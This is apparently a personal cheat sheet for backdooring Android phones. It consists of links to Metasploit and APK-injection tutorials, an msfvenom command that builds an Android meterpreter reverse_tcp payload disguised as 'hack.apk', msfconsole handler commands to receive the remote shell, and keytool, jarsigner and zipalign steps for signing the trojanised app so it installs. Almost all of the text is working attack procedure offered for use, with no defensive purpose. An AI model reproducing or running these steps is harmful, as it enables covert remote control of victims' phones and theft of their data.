https://github.com/manofftoday/venomdroid3
https://hackingvision.com/2017/02/18/hack-android-phone-metasploit/
https://pentestlab.blog/2017/03/13/injecting-metasploit-payloads-into-android-applications/
http://resources.infosecinstitute.com/lab-android-exploitation-with-kali/#gref
https://www.hackeroyale.com/hack-android-using-airdroid/
apkwash
apkinject
zipalign
backdoor-apk (https://github.com/dana-at-cp/backdoor-apk\)
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 R > hack.apk
##will make this an resource script
# msfconsole
msf >use multi/handler
msf exploit(handler) >set payload android/meterpreter/reverse_tcp
msf exploit(handler) >set LHOST 192.168.1.4
msf exploit(handler) >set LPORT 4444
msf exploit(handler) >exploit
Signing Methods
Keytool (Comes Pre-Installed in Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsinger (Comes Pre-Installed in Kali Linux)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
jarsigner -verify -verbose -certs APPNAME.apk
Install Zipalign
apt-get install zipalign
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
Alternatively if you prefer to sign your .apk file direct from your Android device you can sign your .apk files withZipSigneran Android app that signs update.zip files, APK, or JAR files using your own private keys or one of the four built-in certificates (media, platform, shared, testkey). All output are automatically zip-aligned. ZipSigner is an app combination of jarsigner, signapk, keytool, and zipalign.
http://www.hackingarticles.in/hack-android-phone-using-backdoor-apk/